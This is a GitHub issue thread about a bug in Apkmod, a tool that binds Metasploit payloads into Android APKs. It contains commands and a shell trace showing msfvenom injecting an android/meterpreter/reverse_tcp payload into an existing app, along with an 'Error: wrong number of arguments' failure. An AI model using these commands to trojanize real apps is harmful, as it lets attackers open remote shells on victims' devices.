### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by Chingo-X** [Hax4us/Apkmod#8]
Hello 
Any help plz ? Thanks for this great tool 
![Screenshot_20190929-160809_Termux](https://user-images.githubusercontent.com/52953017/65833725-8c387d80-e2d3-11e9-899e-fd29a71c625b.png)

**Comment by Hax4us** [comment]
Run it and give screenshot
`sh -x $(which apkmod) -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444`

**Comment by Chingo-X** [comment]
It gives me same bug 

sh -x $(which apkmod) -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444
+ pwd
+ CWD=/sdcard
+ VERSION=1.3
+ cyan=\033[1;36m
+ green=\033[1;32m
+ red=\033[1;31m
+ yellow=\033[1;33m
+ blue=\033[1;34m
+ purple=\033[1;35m
+ reset=\033[0m
+ wget -q --spider http://google.com
+ [ 0 -eq 0 -a ! -b = -u ]
+ update
+ curl -L -s https://github.com/Hax4us/Apkmod/raw/master/apkmod.sh
+ grep -w VERSION=
+ head -n1
+ temp=VERSION="1.3"
+ cut -d " -f1
+ sed -e s/[^0-9]\+[^0-9]/ /g
+ echo -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444
+ grep -i LHOST
+ cut -d = -f2
+ LHOST=127.0.0.1
+ echo -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444
+ grep -i+ + sedcut -d = -f2
 LPORT
 -e s/ /\n/g
+ LPORT=4444
+ getopts :d:r:s:b:o:ahvu opt
+ readlink -f /sdcard/binded.apk
+ out_abs_path=/storage/emulated/0/binded.apk
+ getopts :d:r:s:b:o:ahvu opt
+ [ -b = -d ]
+ [ -b = -r ]
+ [ -b = -s ]
+ [ -b = -b ]
+ validate_input -b /storage/emulated/0/app-release.apk /storage/emulated/0/binded.apk 127.0.0.1 4444
+ [ -b = -b ]
+ [ 5 -ne 5 ]
+ file_exist /storage/emulated/0/app-release.apk
+ [ ! -e /storage/emulated/0/app-release.apk ]
+ dir_exist /storage/emulated/0
+ [ ! -d /storage/emulated/0 ]
+ [ ! -b = -b -a 5 -ne 3 ]
+ [ -b = -d -o -b = -s ]
+ [ -b = -r ]
+ bindapk 127.0.0.1 4444 /storage/emulated/0/app-release.apk /storage/emulated/0/binded.apk
+ print_status Binding /storage/emulated/0/app-release.apk
+ printf \033[1;34m[*] \033[1;32mBinding /storage/emulated/0/app-release.apk\n\033[0m
[*] Binding /storage/emulated/0/app-release.apk
+ [*] Binding /storage/emulated/0/app-release.apk
+ [  = yes ]
+ msfvenom -x /storage/emulated/0/app-release.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o /storage/emulated/0/binded.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/app-release.apk
Error: wrong number of arguments (given 2, expected 3)
+ [ ! -e /storage/emulated/0/binded.apk ]
+ error_msg Try again with -a option\nBut if still can't bind, take screenshot and open a issue on github
+ printf \033[1;31m[!] \033[1;33mTry again with -a option\nBut if still can't bind, take screenshot and open a issue on github\033[0m\n
[!] Try again with -a option
But if still can't bind, take screenshot and open a issue on github
+ exit 1
#

**Comment by Chingo-X** [comment]
[
![Screenshot_20190929-163337_Termux](https://user-images.githubusercontent.com/52953017/65834077-95c3e480-e2d7-11e9-8164-80ed1adb16ff.png)

**Comment by Hax4us** [comment]
Well how did you install metasploit ?

**Comment by Hax4us** [comment]
Closing with https://github.com/Hax4us/Apkmod/commit/850aa0a28c9ca26d1a65ddb705f72106afab046d

**Comment by hocinelop** [comment]
Still same problem 
u0_a132@localhost ~> apkmod -b /sdcard/apps/play.apk -o /sdcard/apps/binded_play.apk LHOST=127.0.0.1 LPORT=4444
[*] Binding /storage/emulated/0/apps/play.apk
Using APK template: /storage/emulated/0/apps/play.apk
Error: wrong number of arguments (given 2, expected 3)
[!] Try again with -a option
But if still can't bind, take screenshot and open a issue on github
